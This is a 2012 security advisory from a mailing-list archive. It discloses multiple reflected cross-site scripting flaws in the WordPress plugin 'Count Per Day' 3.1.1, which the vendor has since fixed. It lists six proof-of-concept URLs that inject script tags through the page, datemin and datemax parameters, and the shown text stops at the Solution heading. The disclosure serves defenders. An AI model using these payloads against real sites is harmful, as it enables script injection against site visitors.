16 Jul 2012 09:37
WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
<sschurtz <at> darksecurity.de>
2012-07-16 07:37:14 GMT
2012-07-16 07:37:14 GMT
Advisory: WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities Advisory ID: SSCHADV2012-015 Author: Stefan Schurtz Affected Software: Successfully tested on 'Count Per Day' 3.1.1 Vendor URL: http://www.tomsdimension.de/wp-plugins/count-per-day Vendor Status: fixed ========================== Vulnerability Description ========================== The WordPress plugin 'Count Per Day' 3.1.1' is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(88)</script> http://[target]/wordpress/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script> ========= Solution =========(Continue reading)
RSS Feed